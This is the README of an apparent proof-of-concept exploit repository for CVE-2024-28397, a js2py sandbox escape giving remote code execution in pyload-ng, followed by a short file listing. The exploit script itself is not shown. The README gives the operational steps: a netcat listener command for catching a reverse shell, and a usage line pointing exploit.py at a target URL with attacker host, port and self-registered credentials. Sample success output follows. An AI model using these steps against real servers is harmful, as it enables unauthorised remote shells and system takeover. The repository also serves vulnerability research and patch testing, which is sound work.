PoC exploit for CVE-2024-28397 – Remote Code Execution in pyload-ng via js2py sandbox escape# 🚨 Remote Code Execution – CVE-2024-28397 (pyload-ng / js2py)
This repository contains a **Proof-of-Concept (PoC)** exploit for **CVE-2024-28397**, a Remote Code Execution vulnerability affecting **pyload-ng** due to insecure usage of **js2py**.
> ⚠️ **Disclaimer:**
> This PoC is for **educational and research purposes only**.
> Do not use it on systems you do not own or have explicit permission to test.
> The author is **not responsible** for any misuse of this code.
---
## 🐛 Vulnerability Details
- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Component:** `js2py` in `pyload-ng`
- **Impact:** Remote Code Execution (RCE)
- **Attack Vector:** Malicious JS payload escapes the js2py sandbox and executes arbitrary system commands.
---
## 📦 Requirements & Setup
You will need **Python 3.x**, the `requests` library, and `netcat` for catching the reverse shell.
- 🖥️ Target → Vulnerable pyload-ng instance with /run_code endpoint accessible
## 🎧 Listener → Start before running exploit:
**nc -lvnp 4444**
## 🖥️ Usage:
**python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123**
## 📌 Example Output:
- [+] Register successful!
- [+] Login successful
- [+] exploit worked
[4.0K] /data/pocs/afa1980625fbc99231264ceec074b788e48467c9
├── [2.5K] poc.py
└── [1.3K] README.md
0 directories, 2 files